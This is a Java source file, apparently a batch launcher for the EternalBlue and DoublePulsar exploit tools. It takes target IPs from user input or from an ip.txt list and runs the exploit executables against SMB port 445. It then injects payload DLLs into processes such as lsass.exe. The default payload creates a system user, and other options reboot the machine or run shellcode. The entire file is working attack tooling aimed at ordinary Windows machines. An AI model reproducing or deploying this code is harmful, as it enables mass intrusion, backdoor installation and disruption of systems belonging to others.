import java.io.BufferedReader;
import java.io.File;
import java.io.FileReader;
import java.io.InputStreamReader;
import java.net.URISyntaxException;
import java.net.URL;
/**
* Created by 1135 on 2017/5/3.
*/
public class Exploit {
public void runCMD(String command) throws Exception {
Process p = Runtime.getRuntime().exec("cmd /c cmd.exe /c " + command + " exit");//cmd /c dir 执行完dir命令后关闭窗口。
//runCMD_bat("C:\\1.bat");/调用
//Process p = Runtime.getRuntime().exec("cmd /c start cmd.exe /c " + path + " exit");//显示窗口 打开一个新窗口后执行dir指令(原窗口会关闭)
BufferedReader br = new BufferedReader(new InputStreamReader(p.getInputStream()));
String readLine = br.readLine();
while (readLine != null) {
readLine = br.readLine();
System.out.println(readLine);
}
if (br != null) {
br.close();
}
p.destroy();
p = null;
}
public void EBexp_function() {
URL url = getClass().getProtectionDomain().getCodeSource().getLocation();
File myfile = null;
try {
myfile = new File(url.toURI());
} catch (URISyntaxException e) {
e.printStackTrace();
}
File dir = myfile.getParentFile(); //jar文件所在的绝对目录
String ip = null;
String port = null;
String TargetOS = null;
BufferedReader br = new BufferedReader(new InputStreamReader(System.in));
try {
//ip
System.out.println("input TargetIpAddress or list (Default. The 'list' will use ip.txt):");
ip = br.readLine();
//在命令执行前判断
//port
System.out.println("input TargetPort(Default:445):");
port = br.readLine();
if (port.equals("")) port = "445";
//port为空,则设置为445 否则则为用户输入的值
//TargetOS
System.out.println("input TargetOS(Default:WIN72K8R2 other:XP):");
TargetOS = br.readLine();
if (TargetOS.equals("")) TargetOS = "WIN72K8R2";
//files文件夹内放着nsa工具
//dlls文件夹里放着攻击载荷 x86/x64 dll文件
//logs文件夹里放着命令执行结果 格式为EB/DP_ip_port.txt 如EB_192.168.0.1_445.txt
if (ip.equals("list")||ip.equals("")) {
/**
* 一行一行读取文件,适合字符读取,若读取中文字符时会出现乱码
*流的关闭顺序:先打开的后关,后打开的先关, 否则有可能出现java.io.IOException: Stream closed异常
*/
try {
//System.out.println(dir);
File file = new File(dir+File.separator+"ip.txt");
String tempString = null;
BufferedReader reader = null;
try {//以行为单位读取文件内容,一次读一整行
reader = new BufferedReader(new FileReader(file));
int line = 1;
// 一次读入一行,直到读入null为文件结束
while ((tempString = reader.readLine()) != null) {
// 显示行号
tempString = tempString.trim();
System.out.println(line + " CurrentIP " + tempString);
System.out.println(tempString);
String EBexpCommand = "C:\\Windows\\System32\\cmd.exe /c files\\Eternalblue-2.2.0.exe --InConfig " + dir+File.separator+"files"+File.separator +"Eternalblue-2.2.0.xml"+ " --TargetIp " + tempString + " --TargetPort " + port + " --OutConfig " + dir+File.separator+"logs" +File.separator+"EB_" + tempString + "_" + port + ".txt" + " --Target " + TargetOS;
System.out.println(EBexpCommand);
runCMD(EBexpCommand);
line++;
}
reader.close();
} catch (Exception e) {
}
finally {
if (reader != null) {
try {
reader.close();
} catch (Exception e)
{
}
}
}
}
catch(Exception e) {
e.printStackTrace();
}
} else {
String EBexpCommand = "C:\\Windows\\System32\\cmd.exe /c files\\Eternalblue-2.2.0.exe --InConfig files\\Eternalblue-2.2.0.xml --TargetIp " + ip + " --TargetPort " + port + " --OutConfig " +dir+File.separator+"logs" +File.separator+"EB_" + ip + "_" + port + ".txt" + " --Target " + TargetOS;
System.out.println(EBexpCommand);
runCMD(EBexpCommand);
}
} catch (Exception e) {
}
}
public void DPexp_function() {
URL url = getClass().getProtectionDomain().getCodeSource().getLocation();
File myfile = null;
try {
myfile = new File(url.toURI());
} catch (URISyntaxException e) {
e.printStackTrace();
}
File dir = myfile.getParentFile(); //jar文件所在的绝对目录
String networkTimeout = null;
String ip = null;
String port = null;
String protocol = null;
String architecture = null;
String function = null;
String payload = null;
String dllordinal = null;
String processName = null;
String processCommandLine =null;
BufferedReader br = new BufferedReader(new InputStreamReader(System.in));
try {
//ip
System.out.println("input TargetIpAddress or list (Default. The 'list' will use ip.txt):");
ip = br.readLine();
//在命令执行前判断
//port
System.out.println("input TargetPort(Default:445):");
port = br.readLine();
if (port.equals("")) port = "445";
//port为空,则设置为445 否则则为用户输入的值
//protocol
System.out.println("input protocol(Default:SMB other:RDP):");
protocol = br.readLine();
if (protocol.equals("")) protocol = "SMB";
//architecture
System.out.println("input architecture(Default:x64 other:x86):");
architecture = br.readLine();
if (architecture.equals("")) architecture = "x64";
//Function
System.out.println("input Function(Default:RunDll): \n other:\nPing(Check whether the backdoor is installed)" +
"\nOutPutInstall(Generate a shellcode)" +
"\nRunShellcode" +
"Uninstall");
function = br.readLine();
if (function.equals("")) function = "RunDLL";
//payload
System.out.println("input payloadDllname(Default:x64createSysUser.dll other: X64reboot.dll X86reboot.dll x64createSysUser.dll x86createSysUser.dll your.dll):");
payload = br.readLine();
if (payload.equals("")) payload = "x64createSysUser.dll";
//payloadDllOrdinal 默认1 : The exported ordinal number of the DLL being injected to call
System.out.println("input payloadDllOrdinal(Default:1):");
dllordinal = br.readLine();
if (dllordinal.equals("")) dllordinal = "1";
//ProcessName :: Name of process to inject into
System.out.println("input ProcessName to inject into (Default:lsass.exe other:explorer.exe svchost.exe ):");
processName = br.readLine();
if (processName.equals("")) processName = "lsass.exe";
//ProcessCommandLine :: Command line of process to inject into
System.out.println("input ProcessCommandLine :: Command line of process to inject into (Default:\"\"):");
processCommandLine = br.readLine();
if (processCommandLine.equals("")) processCommandLine = "\"\"";
//NetworkTimeout
System.out.println("input NetworkTimeout(Default 60):");
networkTimeout = br.readLine();
if (networkTimeout.equals("")) networkTimeout = "60";
if (ip.equals("list")||ip.equals("")) {
/**
* 一行一行读取文件,适合字符读取,若读取中文字符时会出现乱码
*流的关闭顺序:先打开的后关,后打开的先关, 否则有可能出现java.io.IOException: Stream closed异常
*/
try {
//System.out.println(dir);
File file = new File(dir+File.separator+"ip.txt");
BufferedReader reader = null;
try {//以行为单位读取文件内容,一次读一整行
reader = new BufferedReader(new FileReader(file));
String tempString = null;
int line = 1;
// 一次读入一行,直到读入null为文件结束
while ((tempString = reader.readLine()) != null) {
// 显示行号
System.out.println(line + " CurrentIP " + tempString);
String DPexpCommand = "C:\\Windows\\System32\\cmd.exe /c "+ dir +File.separator+"files"+File.separator+"Doublepulsar-1.3.1.exe --InConfig " + dir+File.separator+"files"+File.separator +"Doublepulsar-1.3.1.xml --TargetIp " + tempString + " --TargetPort " + port + " --OutConfig " + dir+File.separator+"logs" +File.separator+ "DP_" + tempString + "_" + port + ".txt" + " --Protocol " + protocol + " --Architecture " + architecture + " --Function " + function + " --DllPayload " +dir +File.separator+"dlls"+File.separator+payload +" --payloadDllOrdinal "+dllordinal+" --ProcessName "+processName+" --ProcessCommandLine "+processCommandLine+" --NetworkTimeout "+networkTimeout;
System.out.println(DPexpCommand);
runCMD(DPexpCommand);
line++;
}
reader.close();
} catch (java.io.FileNotFoundException e)
{
System.err.println("Can't find file ip.txt in jar file directory.");
}
catch (Exception e) {
e.printStackTrace();
}
finally {
if (reader != null) {
try {
reader.close();
} catch (Exception e)
{
}
}
}
}
catch(Exception e) {
e.printStackTrace();
}
} else {
//System.out.println(networkTimeout+ip+port+processCommandLine+protocol);
/*
String networkTimeout = null;
String ip = null;
String port = null;
String protocol = null;
String architecture = null;
String function = null;
String payload = null;
String dllordinal = null;
String processName = null;
String processCommandLine =null;
*/
String DPexpCommand = "C:\\Windows\\System32\\cmd.exe /c "+ dir +File.separator+"files"+File.separator+"Doublepulsar-1.3.1.exe --InConfig " + dir+File.separator+"files"+File.separator +"Doublepulsar-1.3.1.xml --TargetIp " + ip + " --TargetPort " + port + " --OutConfig " + dir+File.separator+"logs" +File.separator+ "DP_" + ip + "_" + port + ".txt" + " --Protocol " + protocol + " --Architecture " + architecture + " --Function " + function + " --DllPayload " +dir +File.separator+"dlls"+File.separator+payload +" --payloadDllOrdinal "+dllordinal+" --ProcessName "+processName+" --ProcessCommandLine "+processCommandLine+" --NetworkTimeout "+networkTimeout;
System.out.println(DPexpCommand);
runCMD(DPexpCommand);
}
} catch (Exception e)
{
}
//System.out.println(new Date());
//runCMD_bat(DPexpCommand);
//System.out.println(new Date());
}
}
